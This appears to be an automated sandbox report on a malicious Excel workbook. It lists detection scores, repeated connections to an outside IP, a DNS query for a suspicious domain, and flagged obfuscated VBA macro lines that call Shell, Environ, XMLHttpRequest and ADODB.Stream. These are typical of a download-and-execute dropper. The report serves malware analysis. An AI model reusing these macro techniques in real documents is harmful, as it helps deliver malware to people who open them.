Source: xls.xls |
ReversingLabs: Detection: 17% |
Source: xls.xls |
Virustotal: Detection: 39% |
Perma Link |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49171 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49172 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49173 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49174 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49175 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 91.213.50.111:443 -> 192.168.2.22:49176 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
DNS query: name: dooxil.com |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49171 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49172 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49173 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49174 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49175 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49176 -> 91.213.50.111:443 |
Source: unknown |
DNS traffic detected: queries for: dooxil.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49176 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49175 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49174 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49173 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49172 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49171 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49172 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49175 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49171 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49176 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49173 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49174 -> 443 |
Source: xls.xls |
Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'ADODB.Stream' functions open, read, write |
|
Source: xls.xls |
OLE, VBA macro line: riporti = trattasse(scoperte, Shell(riporti)) |
|
Source: xls.xls |
OLE, VBA macro line: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module Foglio1, Function dimostrargli, String environ: scoperte = aspetteremo(Left(Environ(ammiratrice("A7Uc6oP5mAs31p0Ee0c1", 3)), 20) & ammiratrice("S5r1Yu3n11dIIl7lM87", 1) & "32" & ammiratrice("K60.3EHeNN7x56eO", 4)) |
Name: dimostrargli |
Source: xls.xls |
Stream path '_VBA_PROJECT_CUR/VBA/Foglio1' : found possibly 'XMLHttpRequest' functions response, responsetext, open, send |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module Foglio1, Function stupidaggine, found possibly 'XMLHttpRequest' functions response, responsetext, open, send |
Name: stupidaggine |
Source: xls.xls |
OLE indicator, VBA macros: true |
Source: xls.xls |
ReversingLabs: Detection: 17% |
Source: xls.xls |
Virustotal: Detection: 39% |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR622B.tmp |
Jump to behavior |
Source: xls.xls |
OLE indicator, Workbook stream: true |
Source: classification engine |
Classification label: mal68.expl.winXLS@1/0@1/1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |